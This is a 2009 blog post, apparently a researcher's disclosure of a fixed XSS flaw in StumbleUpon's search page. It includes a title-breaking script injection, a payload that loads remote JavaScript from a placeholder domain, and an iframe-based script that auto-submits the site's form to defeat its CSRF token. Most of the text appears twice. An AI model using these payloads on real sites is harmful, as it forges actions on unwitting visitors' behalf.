Details of StumbleUpon Hack Released
Sat, 28 Feb 09 15:42:51 -0700
A few months ago, I located an XSS vulnerability in StumbleUpon.com, I developed the exploit, via XSSRF to leverage an auto-thumbs-up exploit.
The concept is, if properly executed, the exploit could make any person that visits a page automatically give the said page a "Thumbs Up."
I reported the flaw, and the system has been fixed. You know what that means... I get to publish and brag.
The primary XSS exploit was located in the StumbleUpon.com search engine, an injection of </title><script>alert(\'proof of concept\')</script> yielded a positive result.
So, I decided to see how far I could take the exploit, in theory.
I knew that there were pages with a "Thumbs Up This Page" link on them, but I had never tried it, so I clicked the link and it brought me to a page like this: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fhumanbagel.com%2Fblog.php&title=StumbleUpon.com+Hack+Closed
Looking at the source code, there is a hidden input, \'ftoken\' with a randomised hash for the value. This value must correctly match the value stored in the session for the form to submit. Fairly standard CSRF protection. Fairly effective CSRF protection, too.
But, with an XSS exploit, a remote script, and some crafty scripting, I can place a hidden iframe on the search page, pointing towards the form page. Then, via the script, dynamically fill the inputs for tags and review, and then submit the form.
The CSRF protection is useless, as their own form was used, just as intended, except JavaScript filled the inputs and submitted the form. The perfect crime.
The script I used (modified for demonstration purposes):
The specific injection was:
</title><script src="http://[domain]/file.js"></script>
I would like to clearly state that the only time I used this exploit was to test it and when I submitted the security report. I never used it on anyone unsuspecting.
A few months ago, I located an XSS vulnerability in StumbleUpon.com, I developed the exploit, via XSSRF to leverage an auto-thumbs-up exploit.
The concept is, if properly executed, the exploit could make any person that visits a page automatically give the said page a "Thumbs Up."
I reported the flaw, and the system has been fixed. You know what that means... I get to publish and brag.
The primary XSS exploit was located in the StumbleUpon.com search engine, an injection of </title><script>alert(\'proof of concept\')</script> yielded a positive result.
So, I decided to see how far I could take the exploit, in theory.
I knew that there were pages with a "Thumbs Up This Page" link on them, but I had never tried it, so I clicked the link and it brought me to a page like this: http://www.stumbleupon.com/submit?url=http%3A%2F%2Fhumanbagel.com%2Fblog.php&title=StumbleUpon.com+Hack+Closed
Looking at the source code, there is a hidden input, \'ftoken\' with a randomised hash for the value. This value must correctly match the value stored in the session for the form to submit. Fairly standard CSRF protection. Fairly effective CSRF protection, too.
But, with an XSS exploit, a remote script, and some crafty scripting, I can place a hidden iframe on the search page, pointing towards the form page. Then, via the script, dynamically fill the inputs for tags and review, and then submit the form.
The CSRF protection is useless, as their own form was used, just as intended, except JavaScript filled the inputs and submitted the form. The perfect crime.
The script I used (modified for demonstration purposes):
function autoSubmit(url, fnum, fn, inputs) {
window.onload = function() {
ifr = document.createElement("iframe");
ifr.src = url;
ifr.setAttribute("id", "framimo");
document.body.appendChild(ifr);
ifr.onload = function() { myload() } // Good browsers
window.frames[1].onload = function() { myload() } // IE
function myload() {
miframe = window.frames[1].document;
for(i in inputs)
{
window.frames[1].document.forms[1].elements[i].value = inputs[i];
}
window.frames[1].document.forms[1].submit();
}
}
}
autoSubmit(\'/submit?url=http%3A%2F%2Fhumanbagel.com%2Fblog.php&title=StumbleUpon.com+Hack+Closed\',
1, 1,
{tagnames: \'programming, hacking, stumbleupon, human bagel\',
newcomment: \'Asshole hacked stumbleupon and didnt tell us until the problem was fixed\'});
The specific injection was:
</title><script src="http://[domain]/file.js"></script>
I would like to clearly state that the only time I used this exploit was to test it and when I submitted the security report. I never used it on anyone unsuspecting.